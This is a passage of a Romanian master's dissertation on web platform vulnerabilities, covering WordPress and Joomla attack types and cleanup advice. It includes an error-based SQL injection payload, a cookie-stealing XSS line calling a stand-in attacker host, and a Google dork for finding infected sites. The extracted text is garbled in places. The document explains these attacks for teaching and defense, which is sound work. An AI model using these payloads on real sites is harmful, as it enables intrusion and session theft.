Programul de studii: TEORIA COD ARII S I STOC ARII INFORMAT IEI [609846]

UNIVERSITATEA POLITEHNIC A DIN BUCURES TI
FACULTATEA DE S TIINTE APLICATE
Programul de studii: TEORIA COD ARII S I STOC ARII INFORMAT  IEI
Aprobat Decan,
Prof. Univ. Dr. Emil PETRESCU
LUCRARE DE DISERTAT  IE
Vulnerabilit at i ale Platformelor Web
Coordonator proiect:
Prof. Lect. Andrei-George OPRINA
Masterand: [anonimizat] TI
2019

Cuprins
List a de guri 3
1 Introducere 4
1.1 Ce este o platforma Web? . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2 Arhitectura platformelor web . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3 Caracteristicile platformelor web . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4 Interfat a bazei de date . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2 Vulnerabilit at ile platformei WordPress 6
2.1 Introducere – WordPress . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.2 Principalele vulnerabilit at i ale platformei WordPress . . . . . . . . . . . . 7
2.2.1 Duplicare Content . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.2 Plugin-uri  si teme vulnerabile . . . . . . . . . . . . . . . . . . . . . 7
2.2.3 Nevoia de update-uri constante . . . . . . . . . . . . . . . . . . . . 7
2.2.4 Customizarea necesit a cuno stint e de programare . . . . . . . . . . . 7
3 Vulnerbilit at ile Platformei Joomla 8
3.1 Joomla SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.2 Joomla XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.3 Javascript Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
3.4 Phishing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
3.5 Pharma Hack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3.6 Server congurat gres ,it . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3.7 Cur at area Joomla Hack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
3.7.1 Cur at area bazei de date . . . . . . . . . . . . . . . . . . . . . . . . 11
3.7.2 Fixarea Joomla Hack: securizarea serverului . . . . . . . . . . . . . 11
3.7.3 Fixarea Joomla Hack: Setarea permisiunilor . . . . . . . . . . . . . 12
3.7.4 Fixarea Joomla Hack: Vericat ,i s ,ierele modicate . . . . . . . . . 12
3.7.5 Fixarea Joomla Hack: Vericat ,i jurnalele utilizatorilor . . . . . . . 13
3.7.6 Fixarea Joomla Hack: Actualizare . . . . . . . . . . . . . . . . . . . 13
4 Bitcoin Mining 13
4.1 Introducere . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4.2 Creat ie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4.3 Blockchain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
4.4 Mineritul Bitcoin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5 Aplicat ie 16
5.1 Vulnerabilitate Joomla! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.1 Joomla Hack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.2 Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.3 Analiz a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.4 Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
5.1.5 Solutie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
5.2 Vulnerabilitate WordPress WooCommerce XSS { Hack asupra unui cont
de client cu o imagine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
5.3 Vulnerabilitatea Drupal (CVE-2018-7602) a fost exploatat a pentru a fur-
niza malware de tip "Monero-Mining" . . . . . . . . . . . . . . . . . . . . . 36

List a de guri
1 Fix pentru update-ul CVE-2017-7985 . . . . . . . . . . . . . . . . . . . . . 17
2 Fix pentru CVE-2017-7986 . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
3 Introducerea noului PoC pentru CVE-2017-7985 . . . . . . . . . . . . . . . 18
4 Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n prima pagin a . . . . . 19
5 Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n pagina de administrator 19
6 Atacul codurilor HTML folosind \%0d%0a" . . . . . . . . . . . . . . . . . 20
7 Inserare PoC ^ n tag-ul SVG . . . . . . . . . . . . . . . . . . . . . . . . . . 20
8 SVG tag XSS ^ n prima pagin a . . . . . . . . . . . . . . . . . . . . . . . . . 21
9 SVG tag XSS ^ n pagina de administrator . . . . . . . . . . . . . . . . . . . 21
10 Ad augarea codului XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
11 Administratorul site-ului declan seaz a atacul XSS ^ n pagina de administrator 27
12 Un nou SuperUser ad augat de atacator . . . . . . . . . . . . . . . . . . . . 27
13 ^Incarcarea unui shell web folosind Super contul de utilizator al atacatorului 28
14 Atacatorul este capabil de a accesa shell-ul web  si execut a comenzi . . . . . 28
15 Patch CVE-2019-9168 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
16 Upload imagine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
17 Injectare cod XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
18 Imaginea compromisa uploadat a in pagina de Produse . . . . . . . . . . . 32
19 Zoom pe imaginea produsului . . . . . . . . . . . . . . . . . . . . . . . . . 33
20 Declan sarea atacului XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
21 Crearea s ,ierului PoC la nivel local . . . . . . . . . . . . . . . . . . . . . . 34
22 Managerul de site utilizeaz a s ,ierul PoC ca imagine a produsului . . . . . . 35
23 Declan sarea atacului XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
24 Fragment de cod care arat a modul ^ n care CVE-2018-7602 este exploatat a 37
25 Fragment de cod care arat a modul ^ n care este recuperat scriptul shell . . . 37
26 O intrare crontab ad augat a de malware pentru a se actualiza automat . . . 37
27 Codurile de asamblare ale funct ,iei SEND DATA a downloader-ului . . . . . 38
28 O parte din XMRig inclus a ^ n malware-ul de tip minerit de criptograe . . 39
29 Pseudo-codurile inversate ale funct ,iei principale () a lui Monero-miner . . . 40
30 TOR informat ,ii nod de ies ,ire (2018/06/16) pentru 197 [.] 231 [.] 221 [.] 211 41

1 Introducere
1.1 Ce este o platforma Web?
O platform a web este o aplicat ie folosit a de utilizatori printr-o ret ea, cum ar  In-
ternetul. Web aplicat iile interact ioneaz a de obicei, cu o baz a de date, permit ^ and unui
utilizator al aplicat iei s a act ioneze (indirect) cu acea baz a de date. Ele sunt scrise ^ ntr-un
limbaj de programare ales de dezvoltator. Adesea aplicat iile sunt scrise ^ n limbi dinamice
de scripting. Exemple de limbi de programare utilizate adesea pentru aplicat iile web sunt
PHP, ASP.NET, Java, Ruby, Python s ,i Perl. Cu toate acestea, aplicat ii web de obicei,
nu sunt scrise direct ^ ntr-un astfel de limbaj de programare, ci mai degrab a ^ ntr-un cadru
web. Din punctul de vedere al dezvoltatorului, multe aplicat ii web desf a soar a activit at i
similare  si nu are sens s a pun a ^ n aplicare acelea si funct ,ionalit at i de ecare dat a. Platfor-
mele web furnizeaz a bibliotecile s a implementeze multe astfel de sarcini, facilit and astfel
dezvoltarea aplicat iilor web.
Init ial, un cadru web ar putea  v azut ca o colect ie de biblioteci destinate s a ajute dezvol-
tatorii web. Aceste biblioteci sunt scrise ^ n acela si limbaj de programare ca  si aplicat ia.
Dezvoltatorul poate include toate funct ionalit at ile din cadrul de care are nevoie. Cu toate
acestea, ast azi a sa-numitul "stack complet", cadrele sunt mai frecvente. Aceste cadre nu
sunt doar o colect ie de biblioteci, ci pot  v azute ca o extensie a limbajului de programare.
Desigur, cadrele ofer a ^ n continuare multe funct ,ionalit at i comune gata de utilizare, dar
fac  si mai multe. Ele formeaz a un pachet de software coerent ^ n care dezvoltatorii ^  si
construiesc aplicat iile. Dezvoltatorii sunt destul de limitat i ^ n libertatea lor. Ei trebuie
sa urmeze regulile, adic a modelele  si principiile de proiectare ale cadrului. Nu trebuie
doar s a scrie aplicat ia web ^ n limba de programare pe care au ales-o, ci s a  si includ a unele
funct ionalit at i necesare, dar sunt mai mult sau mai put in fort ate s a lucreze complet ^ n
acest cadru. Aceast a restrict ie ^ n libertate vine cu urm atorul beneciu:
Platformele web pot oferi funct ii web gata de utilizare, iar aplicat iile pot  mai u sor de
scris ^ ntr-un mod frumos  si consecvent ind posibil s a despart a modul de lucru al cadrelor,
de si acest lucru necesit a o munc a suplimentar a. Din fericire, acest lucru nu este adesea
necesar.
1.2 Arhitectura platformelor web
Prima proprietate important a a unui platforme web este tipul de arhitectur a pe care ^ l
utilizeaz a. Acest lucru este^ mp art it^ n dou a p art i, prima ind nivelul pe care funct ioneaz a
cadrul, al doilea ind modelul architectural urmeazat. Explic am diferent ele  si pe ce fel
de cadre se concentreaz a aceast a cercetare. Structurile web urm aresc de obicei, un fel
de model arhitectural (sau, cel put in, ar trebui)  si ele promoveaza sau chiar impune uti-
lizarea acestui model ^ n aplicat iile web, de asemenea. Modelul determin a de exemplu
modul ^ n care este structurat codul, ce se pune unde  si ce componente pot apela / uti-
liza ecare altele (direct). Cel mai utilizat model arhitectural pentru platformele web
este Model-View-Controller (MVC). Este, de exemplu, folosit  si de Ruby on Rails. Alte
modele arhitecturale folosite de web cadrele sunt, de exemplu, arhitectura orientat a pe
pagin a, arhitectura condus a de evenimente sau modelul condus de model arhitectur a. De
asemenea, este posibil ca un cadru s a nu urmeze deloc un model arhitectural clar (sau ^ l
folose ste doar pentru anumite p art i), de si aceste cadre nu sunt, de obicei, bine structurate
 si duc la codul u sor de citit  si ^ ntret inut.
4

1.3 Caracteristicile platformelor web
A doua proprietate ^ n care platformelor web ar putea diferi este caracteristicile pe
care le ofer a dezvoltatorului web. Nu toate cadrele web ofer a aceleas ,i caracteristici.
De exemplu, ^ n timp ce majoritatea cadrelor ofer a un fel de interfat ,a de baze de date,
funct ,ionalit at ,ile cache sunt mult mai put ,in frecvente. Vom prezenta acum cele mai co-
mune caracteristicile cadrelor web:
A doua proprietate ^ n care platformelor web ar putea diferi este caracteristicile pe care le
ofer a dezvoltatorului web. Nu toate cadrele web ofer a aceleas ,i caracteristici. De exemplu,
^ n timp ce majoritatea cadrelor ofer a un fel de interfat ,a de baze de date, funct ,ionalit at ,ile
cache sunt mult mai put ,in frecvente. Vom prezenta acum cele mai comune caracteristicile
cadrelor web:
Interfat ,a bazei de date:
Multe cadre ofer a o interfat , a pentru a efectua operat ,iuni de baz a de date. Cu toate aces-
tea, ceea ce ofer a exact s ,i modul ^ n care aceast a interfat , a este implementat a poate diferi
semnicativ. De cand interfat ,a bazei de date este de interes deosebit pentru cercetarea
noastr a (din cauza posibilelor inject ,ii SQL)
Caching:
Cache-ul poate ajuta la reducerea utiliz arii l at ,imii de band a, a ^ nc arc arii serverului s ,i a
timpilor de r aspuns. De cand aplicat ,iile web trebuie s a e c^ at mai rapide posibil s ,i s a
nu utilizeze prea multe resurse server, multe cadrele web includ mecanisme de caching.
Caching poate  implementat la diferite niveluri de procesul de executare. Ce mecanisme
sunt furnizate s ,i la ce nivel acestea sunt implementate depinde de cadru.
Routing:
Dup a cum am discutat mai devreme, cadrele MVC1ofer a o separare frumoas a a modelului
de date reprezentarea datelor s ,i logica aplicat ,iilor. Cu toate acestea, aplicat ,iile web sunt,
^ n principiu, pagini web r aspunz^ and la cererile HTTP. Deci, avem nevoie de o modalitate
de a permite o anumit a cerere HTTP, pentru a anumit a adres a URL, declans ,eaz a o
anumit a pies a a logicii aplicat ,iei. Cu alte cuvinte, pentru a declans ,a un anumit bucat a de
cod ^ n unele controler. Aceasta a fost de rutare (numit, de asemenea, maparea URL-ul)
intr a ^ n vigoare. Mecanismul de rutare hart a cereri de adrese URL / HTTP c atre anumite
p art ,i ale controlerului s ,i, eventual, s ,i viceversa.
Servicii web:
Site-uri web originale unde se intent ,ioneaz a crearea de aplicat ,ii web care servesc web pa-
gini pentru utilizatorii umani. Cu toate acestea, pe m asur a ce web-ul devine mai integrat,
aplicat ,iile web au adesea pentru a comunica cu alte sisteme externe, de asemenea. Acesta
este scopul serviciilor web. A serviciul web este o pies a a aplicat ,iei care poate  folosit a de
alte sisteme pentru a efectua act ,iuni sau citit ,i datele. Multe cadre web ofer a instrumente
pentru crearea serviciilor web. De exemplu, Ruby este pornit Rails, ofer a un mecanism
pentru a face orice pagin a web disponibil a s ,i ca serviciu web, utiliz^ and JSON sau XML.
Testarea:
Multe cadre ofer a mai multe instrumente pentru a us ,ura cu testarea (automat a). Cadrele
pot include instrumente pentru a specica s ,i verica (automat) testele unit at ,ii, testele
funct ,ionale s ,i integrarea teste. Unele cadre, inclusiv Ruby on Rails, chiar promoveaz a
utilizarea acestor instrumente ^ n mod explicit s ,i s a ^ ncurajeze dezvoltarea testat a TDD2.
Securitatea:
O caracteristic a deosebit de interesant a pentru cercetarea noastr a este sigurant ,a. Ca-
1Model View Controller
2Test Drive Development
5

drele ofer a adesea mai multe instrumente pentru a preveni atacurile comune, cum ar
inject ,iile SQL, Cross-Site Scrierea s ,i falsicarea cererilor pentru site-uri. De asemenea, ar
putea oferi implement ari pentru o anumit a securitate funct ,ionalit at ,i, cum ar  solut ,iile
de autenticare s ,i de autorizare.
1.4 Interfat a bazei de date
Aproape toate frameworks ofer a o interfat  a de baz a de date pentru a efectua operat iuni
de baz a de date. Cu toate acestea, ceea ce ofer a exact pot diferi semnicativ. Unele
cadre ofer a doar comunicarea interfat , a, ^ n cazul ^ n care trebuie s a mai scriet ,i singur in-
terog arile. Alte cadre ofer a, de asemenea, constructori de interog ari care v a permit s a
creat ,i cu us ,urint , a interog ari pentru operat ,iuni comune. Aces ,ti constructori de interog ari
ar putea aplica automat s ,i dezinfectarea datelor de intrare ^ n mod automat. Unele cadre
^ ncearc a s a reduc a munca pentru dezvoltatori.
c^ at mai mult posibil s ,i s a furnizeze multe funct ,ii de ajutor s ,i chiar s a efectueze automat
sarcini comune de baze de date ^ n mod automat. Cel mai interesant pentru aceast a cer-
cetare sunt totus ,i funct ,iile de securitate (de ex. Sanitizarea) pe care le furnizeaz a. Aceste
funct ,ionalit at ,i ar trebui incluse ^ n criteriul de referint , a, astfel ^ nc^ at acestea s a poat a
analizate. Aceasta ar trebui vericat faptul c a aceste funct ,ionalit at ,i ^ mpiedic a inject ,iile
SQL. De asemenea, modul ^ n care este implementat a funct ,ionalitatea, inclusiv tipul de
ORM utilizat de cadru, este important pentru noi. Aceasta determin a modul ^ n care
testele ar trebui s a e puse ^ n aplicare ^ n criteriul de referint , a. De exemplu, ^ ntr-un cadru
care nu este automat aplicat ,i dezinfectarea datelor de intrare ale utilizatorilor, ar trebui
s a ne asigur am c a ajutoarele pentru dezintoxicare sunt ^ ntr-adev ar ind incluse ^ n criteriul
de referint , a.
2 Vulnerabilit at ile platformei WordPress
Internetul este mai dinamic ^ n prezent dec^ at a fost vreodat a p^ an a acum. Accesul la
informat ,ie se realizeaz a printr-un simplu click, iar num arul de bloguri, site-uri de prezen-
tare s ,i magazine online cres ,te ^ n ecare zi. Este mai us ,or ca oric^ and s a-t ,i creezi un site,
e c a vrei s a scrii articole sau s a vinzi produse sau servicii. O resurs a la care apeleaz a
majoritatea persoanelor pentru crearea unui site este WordPress. Fie c a foloses ,ti aceast a
platform a deja, sau doar ai auzit de ea dar nu s ,tii exact ^ n ce const a, articolul nostru t ,i
se adreseaz a. ^It,i vom prezenta pe scurt ce este WordPress s ,i care sunt avantajele, dar s ,i
riscurile la care te supui dac a ^ t ,i creezi un site pe aceast a platform a.
2.1 Introducere – WordPress
WordPress { una dintre cele mai populare platforme CMS
WordPress este o platform a CMS. Dac a nu ai auzit de acest termen p^ an a acum, CMS
este un acronim pentru Content Management System. WordPress este ^ n zilele noastre
prima solut ie de realizare a unui website sau blog la care apeleaz a majoritatea persoanelor.
Motivele variaz a { de la
exibilitatea platformei, la diversitatea plugin-urilor, la faptul c a
interfat ,a este accesibil a, la existent ,a unei variante gratuit a pentru ^ ncep atori, la variat ,ia
temelor disponibile sau posibilit at ,ilor de customizare. ^Ins a, nu foarte multe persoane
cunosc  si vulnerabilit at ile platformei WordPress. ^In continuare noi vom analiza c ateva
6

dintre acestea pentru ca utilizatorii s a e informat i ^ nainte de a lua decizia de a crea un
site.
2.2 Principalele vulnerabilit at i ale platformei WordPress
2.2.1 Duplicare Content
Creatorii de cont inut pe WordPress sunt cei mai familiarizat i cu aceast a problem a.
Atunci c^ and postezi un articol nou, el apare pe WordPress ^ n mai multe locat ,ii { pe
prima pagin a, pe pagin a din categorie, pe pagina din arhiva lunar a, dac a dai click pe un
anumit tag etc. ^In funct ,ie de tem a, un singur articol poate  as ,at ^ n mai multe locat ,ii
pe site. Google poate s a penalizeze astfel de site-uri sau s a le considere spam din cauza
cont ,inutului duplicat. Astfel, site-ul t au ar putea avea de suferit ^ n ranking-urile Google
pe cuvinte cheie.
2.2.2 Plugin-uri  si teme vulnerabile
Des ,i WordPress ofer a utilizatorilor s ai o gam a larg a de plugin-uri, de la cele de secu-
ritate, la cele de SEO3, o mare parte dintre plugin-uri nu sunt vericate temeinic, pot
expuse atacurilor sau nu sunt testate ^ nainte de a  instalate pe un site. Exist a zeci de
mii de plugin-uri pe WordPress, iar o ofert a generoas a nu garanteaz a neap arat o calitate
mai mare.
At^ at plugin-urile, c^ at s ,i temele sunt create de oameni s ,i companii diferite, iar aces ,tia nu
pot  monitorizat ,i, astfel c a pot ap area linii de cod virusate sau erori de programare.
Dac a nu te pricepi s ,i decizi s a instalezi plugin-uri nevericate, site-ul t au poate  mult
mai vulnerabil la atacuri cibernetice. ^It,i recomand am s a apelezi mereu la o echip a de
specialis ,ti care s a te ajute cu congurarea s ,i mentenant ,a site-ului t au.
Aici, la ExpertOnline, noi ^ t ,i oferim site-uri securizate s ,i t ,inem cont de exigent ,ele tale
^ n materie de design. Toate plugin-urile pe care le instal am sunt studiate ^ ndeaproape
^ nainte de instalare, pentru a ne asigura c a site-ul t au funct ,ioneaz a la parametri optimi
s,i este sigur ^ n ecare zi.
2.2.3 Nevoia de update-uri constante
Nu este de ajuns doar s a instalezi platforma WordPress, ai nevoie minim de o tem a
s,i de c^ ateva plugin-uri pentru ca site-ul t au s a funct ,ioneze corespunz ator. De asemenea,
WordPress-ul are nevoie de update-uri constante, ceea ce poate s a afecteze modul ^ n care
se vede tema ta sau s a determine plugin-urile deja instalate s a nu mai funct ,ioneze. Cu
c^ at foloses ,ti mai multe plugin-uri, cu c^ at este mai probabil s a te confrunt ,i cu astfel de
probleme de compatibilitate.
2.2.4 Customizarea necesit a cuno stint e de programare
Dac a vrei s a te bucuri de un site pe WordPress cu anumite funct ,ionalit at ,i ^ n plus
sau un design original, trebuie s a ai cunos ,tint ,e de programare, s a s ,tii c^ ate ceva despre
HTML, CSS sau PHP. Dac a ai cunos ,tint ,e insuciente, pot ,i face mai mult r au dec^ at bine
site-ului t au. Acelas ,i lucru se poate ^ nt^ ampla s ,i dac a apelezi la o echip a de programatori
3Search Engine Optimization
7

insucient preg atit a.
Chiar dac a WordPress are o serie de vulnerabilit at ,i, dac a alegi serviciile unor oameni
competent ,i, pot ,i avea parte de site-ul pe care t ,i-l dores ,ti, s a te bucuri de securitatea
datelor tale s ,i s a te remarci prin cont ,inutul propriu.
3 Vulnerbilit at ile Platformei Joomla
3.1 Joomla SQL Injection
Inject ,ia SQL este una din problemele semnicative de securitate Joomla. Joomla are
o istorie lung a de vulnerabilit at ,i SQL. O inject ,ie SQL este rezultatul intr arii nesanitizate.
Avet ,i ^ ncredere ^ n utilizatorul cu intrare s ,i tot felul de lucruri pot merge prost. Joomla
SQL injectarea dateaz a din 2008 p^ an a ^ n 2008. ^Incep^ and de atunci, datorit a componentei
Ice Gallery , componenta 0 ;5 beta 2 pentru Joomla. S ,i ^ n acest an au fost g asite mai
multe puncte de injectare SQL Joomla. Ultimele inject ,ii SQL Joomla ^ n acest an includ
CVE-2018 8045. Mai multe componente vulnerabile au fost descoperite anul acesta. Cu
toate acestea, pentru a simplica lucrurile ne vom concentra pe cea mai recent a. Com-
ponenta "jimtawl" a lui Joomla este vulnerabil a la injectarea SQL. Vulnerabilitatea se
g ases ,te ^ n parametrul "id". O declarat ,ie post simpl a ar ar ata astfel:
http://localhost/[PATH]/index.php?option=
com_jimtawl&view=user&task=user.edit&id=[SQL]
Cu toate acestea, problema este dac a un utilizator ofer a o intrare nesanitizat a dup a
parametrul "id". Lucrurile pot  escalate de aici ^ ncolo. Acesta poate  exploatat folosind
o instruct ,iune "pe baz a de erori".
' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1)))
,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))|VerAyari'
Deci, acest cod dat mai sus poate  folosit pentru a o exploata. Acest cod imprim a
versiunea de informat ,ii despre utilizator s ,i baza de date a serverului. Codul poate  modi-
cat pentru a executa toate tipurile de operat ,iuni de baz a de date. Recent, detalii despre
acest lucru au fost lansate pe exploit-db. Aceasta ^ nseamn a c a este vizibil public pentru
tot ,i. Deci chiar s ,i un noob poate provoca o hacking Joomla. Mai ales folosind instrumente
cum ar  sqlmap. Sqlmap va automatiza ^ ntregul proces. Deci, aceast a component a este
una dintre problemele de securitate Joomla de pe site-ul propriu
3.2 Joomla XSS
Cross Site Scripting atacurile sunt frecvente pe site-urile Joomla. Probleme multi-
ple de securitate XSS Joomla au fost g asite ^ n acest an. Un Joomla XSS este destul de
similar cu o inject ,ie SQL Joomla. Cu toate acestea, diferent ,a este c a este exploatat a
folosind Javascript. Joomla este cons ,tient a de acest fapt s ,i, prin urmare, are anumite
veric ari s ,i balant ,e. Aceste ltre XSS elimin a intrarea d aun atoare. Cu toate acestea,
CVE-2018-11326 a fost vorba despre ocolirea acestor ltre. A fost sever a pentru c a era
XSS persistent a. Cea mai recent a din aceast a list a lung a este CVE-2018-12711. Modulul
"modul de comutare a limbii" este responsabil de data aceasta. Adresa URL a unor limbi
poate  injectat a cu javascript.
8

<script>window.location=
'http://attacker/cookie='+document.cookie</script>
De exemplu, aceast a bucat a de cod fur a cookie-ul utilizatorului. Deci, acesta este un XSS
re
ectat. Asta ^ nseamn a c a atacatorul poate crea o cerere special a. Trimiterea acestei
solicit ari poate  utilizat a pentru furtul sau furtul de cookie-uri. Instrumente suplimentare
cum ar  Xsser pot ajuta la detectarea s ,i exploatarea automat a a site-urilor web.
3.3 Javascript Injection
C^ and vine vorba de Joomla, Javascript ajut a la ^ ndeplinirea unor sarcini puternice s ,i
dinamice. Uneori, datorit a codic arii defectuoase, exist a o posibilitate pentru o inject ,ie
de Javascript ^ n Joomla. O inject ,ie Javascript v a ajut a ^ n mod substant ,ial s a manipulat ,i
site-ul web. Mai mult, un atacator ^ l poate folosi pentru a fura cookie-urile s ,i pentru a
schimba modul ^ n care arat a site-ul dvs. Este posibil a o simpl a testare manual a pentru
inject ,ia Javascript. ^In bara de adrese a tipului de site:
javascript:alert(`Executed!');
Dac a vedet ,i o caset a de mesaj "Execut a", atunci site-ul este vulnerabil. O inject ,ie cu
Javascript poate avea consecint ,e mortale pentru site, precum:
ˆIntroduce formulare false pe site.
ˆFur a cookie-urile utilizatorilor.
ˆModic a aspectul complet al site-ului.
ˆFolosit pentru redirect ,ion ari false;
ˆFolosit pentru injectarea de spam.
O inject ie cu Javascript este doar o lips a de validare a intr arilor. C^ and vine vorba de
Joomla, nu se bazeaz a pe executarea de c atre client a codului. Cu toate acestea, alt ,i
parametri precum c^ ampurile de intrare ar putea  vulnerabili la inject ,ia Javascript. Deci,
cea mai bun a practic a ar  utilizarea modulelor automate de testare.
3.4 Phishing
Atacurile de tip phishing sunt deseori folosite pentru a comite o hacking Joomla. Un
atac de phishing face ca un utilizator legitim s a cread a ^ n pagini false. Utilizatorul ne-
potrivit trimite apoi informat ,ii sensibile la pagin a. Aceste informat ,ii sunt apoi citite de
atacator pentru a avea acces la sistem. Sunt utilizate mai multe metode de phishing cum
ar :
ˆPagini de autenticare false.
ˆAdrese de e-mail pentru phishing.
ˆApeluri telefonice prin phishing.
9

ˆPagini de actualizare false.
ˆUtilizarea problemelor de securitate de la Joomla, cum ar  XSS, pentru phishing;
Un nou tip de atac de phishing este ^ n cres ,tere ^ n zilele noastre. ^In primul r^ and, arat a
o pagin a de conectare ^ n containerul minimizat. Aceasta arata ca orice alta pagina legi-
tim a. Cu toate acestea, trucul const a ^ n minimizarea paginii. Utilizatorul poate vedea
doar primele cuvinte ale URL-ului. Deci el / ea poate presupune c a pagina este legitim a.
Cu toate acestea, atunci c^ and adresa URL complet a este expus a, scenariul este diferit. A
fost o pagin a fals a creat a de MaliciousSITE.com. Nu este mare lucru pentru ca acesta s a
obt ,in a un certicat HTTPS. ^In plus, anumite trucuri avansate, cum ar  codarea URL-
urilor, sunt utile pentru atacatori. Acest lucru face pagina s a arate exact ca o pagina real a.
3.5 Pharma Hack
Site-urile Joomla sunt t ,inte bune pentru spam-ul SEO. Majoritatea datorit a popu-
larit at ,ii lor. Spamatorii folosesc aceste site-uri web pentru a-s ,i r asp^ andi anunt ,urile. ^In
cea mai mare parte arat a produse farmaceutice, ^ n special pastile. Cea mai mare parte a
site-urilor SEO spam infectate pot  c autate pe Google. Un simplu Google Dork ca inurl:
"viagra" "alimentat de Joomla" poate face trucul. ^Intrebarea de c autare arat a apoi ceva
de genul acesta.
Dup a cum putem vedea toate aceste site-uri Joomla sunt infectate cu SEO Spam. Meta
descrierea lor arata "viagra" anunturi. Mai multe vulnerabilit at ,i Joomla pot  folosite
pentru a injecta acest spam. Probabil ar putea  o inject ,ie de cod sau orice alt a hacking
Joomla. Cu toate acestea, rezultatele sunt devastatoare pentru site. Site-ul ^ s ,i pierde
reputat ,ia s ,i ^ ncrederea utilizatorilor. Poate  greu s a te recuperes ,ti din clasamentul de
c autare dup a un Pharma Hack.
3.6 Server congurat gres ,it
Uneori, ^ n caz de hacking Joomla, serverul defect ar putea  responsabil. Adesea, lipsa
unei permisiuni adecvate pe server poate provoca un dezastru. ^In instal arile Joomla, ^ n
mod implicit, s ,ierul .htacess are permisiunile de scriere. Deci, acest lucru ar putea cauza
atacatorului s a obt ,in a informat ,ii sensibile. Mai multe lucruri pot merge prost cu serverele
cum ar :
ˆSub-domenii uitate.
ˆInstal ari ^ nvechite.
ˆServer DNS neprotejat.
ˆPorturi nesecurizate;
Site-uri multiple care partajeaz a acelas ,i spat ,iu f ar a subret ,ea. Deci, dac a cineva este
infectat, se r asp^ andes ,te.
Deci, instalarea serverului trebuie vericat a din c^ and ^ n c^ and. Permisiunile s ,i erorile de
s,iere slabe expun informat ,ii sensibile. Prin urmare, securitatea serverului este vital a
pentru a evita hacking-ul Joomla.
Avet ,i nevoie de ajutor profesional ^ n asigurarea serverului de la un Joomla Hack? Dat ,i-ne
10

un mesaj pe widget-ul de chat s ,i ne-am bucura s a v a ajut am. Fixat ,i rezultatele mele de
pe site acum.
3.7 Cur at area Joomla Hack
3.7.1 Cur at area bazei de date
^In primul r^ and, ^ ncepet ,i cur at ,area din baza de date infectat a. Joomla SQL injection
poate crea noi utilizatori de baze de date. Pentru a avea grij a de noii utilizatori creat ,i
dup a o anumit a dat a, utilizat ,i urm atorul cod:
SELECT * FROM users LIKE U
AND U.create> UNIX_TIMESTAMP (STR_TO_DATE ('My_Date', '% M% d% Y'));
ce sunt g asit ,i utilizatorii necinstit ,i. Deci, s ,terget ,i-le folosind instruct ,iunea SQL Drop
User ; . Nu numai acest lucru, pentru a evita viitoarele infect ,ii:
ˆSanitizeaz a intrarea utilizatorului.
ˆRestrict ,ionat ,i permisiunile bazei de date la cont.
ˆBlocat ,i dezv aluirea erorii bazei de date doar la nivel local.
ˆFolosit ,i turnarea de tip ori de c^ ate ori este posibil;
3.7.2 Fixarea Joomla Hack: securizarea serverului
Chiar s ,i atunci c^ and instalarea este securizat a, serverele de defect ,iuni pot cauza o
hacking Joomla. Des ,i exist a o mare list a de probleme de securitate Joomla. Anumite
puncte cheie de ret ,inut sunt:
ˆ^Ihidet ,i toate porturile deschise.
ˆScoatet ,i subdomenii neutilizate.
ˆVericat ,i regulat problemele de congurare.
ˆDac a partajat ,i un server merget ,i la subret ,ea. Sau utilizat ,i o ret ,ea VPN.
ˆBlocheaz a mesajele de eroare care scurg din informat ,iile.
ˆDat ,i parole puternice s ,i aleatoare la conturile FTP s ,i la baza de date!
ˆAsigurat ,i-v a c a utilizat ,i un rewall sau un fel de solut ,ie de securitate.
11

3.7.3 Fixarea Joomla Hack: Setarea permisiunilor
^In primul r^ and, asigurat ,i-v a c a niciun utilizator nu poate ^ nc arca s ,iere executabile,
cum ar  .php .aspx, etc. Doar s ,ierele imagine vor  ^ nc arcate pe server. Acum trecet ,i
pentru a seta permisiunile de s ,iere pentru server. Poate s ,ierul cel mai sensibil este
s,ierul .htaccess. Deci, pentru a seta permisiunile de s ,ier adecvate. Setat ,i permisiunea
.htaccess la 444 (r-r-r-) sau poate la 440 (r-r{).
De asemenea, asigurat ,i-v a c a s ,ierele dvs. PHP nu pot  suprascrise. Prin urmare, tre-
buie s a setat ,i * .php la 444 (r-r-r-). Cel mai important este s a utilizat ,i extensiile de s ,iere
populare. Joomla este un CMS destul de mare, astfel ^ nc^ at supleant ,ii sunt ^ ntotdeauna
acolo. Extensiile populare ajung mai rapid ^ n cazul vulnerabilit at ,ii. Deci, ^ ncercat ,i s a le
evitat i.
